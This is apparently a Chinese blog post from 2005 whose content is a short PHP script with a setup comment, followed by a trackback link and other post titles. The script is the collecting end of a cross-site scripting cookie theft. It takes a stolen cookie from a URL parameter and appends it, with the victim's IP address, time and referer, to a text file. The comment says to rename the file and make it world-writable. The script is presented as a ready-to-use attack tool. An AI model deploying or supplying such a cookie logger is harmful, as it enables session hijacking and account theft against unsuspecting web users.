<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
//rename it to cookies.php and create one new file steal.php and chmod it to 777
你可以使用这个链接引用该篇文章 http://publishblog.blogchina.com/blog/tb.b?diaryID=2321982
[2005-07-19] 回家了
[2005-07-19] 什么才叫男人
[2005-07-19] 上瘾之"神经链"解释
[2005-07-19] 师傅,等等我呀
[2005-07-19] 让浏览器搜索速度暴增十倍的秘密!